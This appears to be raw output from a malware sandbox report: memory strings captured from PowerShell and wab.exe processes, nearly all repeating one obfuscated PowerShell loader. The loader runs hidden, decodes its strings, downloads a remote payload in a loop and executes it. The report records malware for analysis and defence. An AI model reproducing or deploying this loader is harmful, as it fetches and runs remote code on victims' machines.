P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe	Binary or memory string: yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:O
Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
Source: wab.exe, 0000000A.00000002.4222367203.0000000007252000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;
Source: powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_Process7860Win32_Processpowershell.exepowershell.exepowershell.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro\|C:\Windows\|\Device\Harddisk0\Partition320240828120116.301492+000C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Slosh
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000002.00000002.2485251498.0000020B74913000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
